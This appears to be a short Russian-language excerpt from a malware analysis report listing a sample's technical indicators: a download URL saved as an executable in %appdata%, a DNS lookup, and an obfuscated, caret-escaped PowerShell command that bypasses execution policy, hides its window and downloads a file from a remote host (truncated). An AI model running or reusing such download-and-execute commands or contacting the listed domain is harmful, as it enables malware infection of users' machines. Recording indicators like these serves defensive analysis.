Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWeRsHE^lL^.E^Xe -^exEc^U^T^Ion^P^oL^i^cY by^P^asS^ -nOp^rof^i^l^e ^-wIN^dow^s^TYl^e hiD^d^EN^ (^nE^w^-ob^jE^CT sY^STem.nE^t.^W^ebc^lI^EnT)^.DOWn^l^Oad^FIL^E^(^'http://www....
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "P^OWeRsHE^lL^.E^Xe -^exEc^U^T^Ion^P^oL^i^cY by^P^asS^ -nOp^rof^i^l^e ^-wIN^dow^s^TYl^e hiD^d^EN^ (^nE^w^-ob^jE^CT sY^STem.nE^t.^W^ebc^lI^EnT)^.DOWn^l^Oad^FIL^E^(^'http://www....' (со скрытым окном)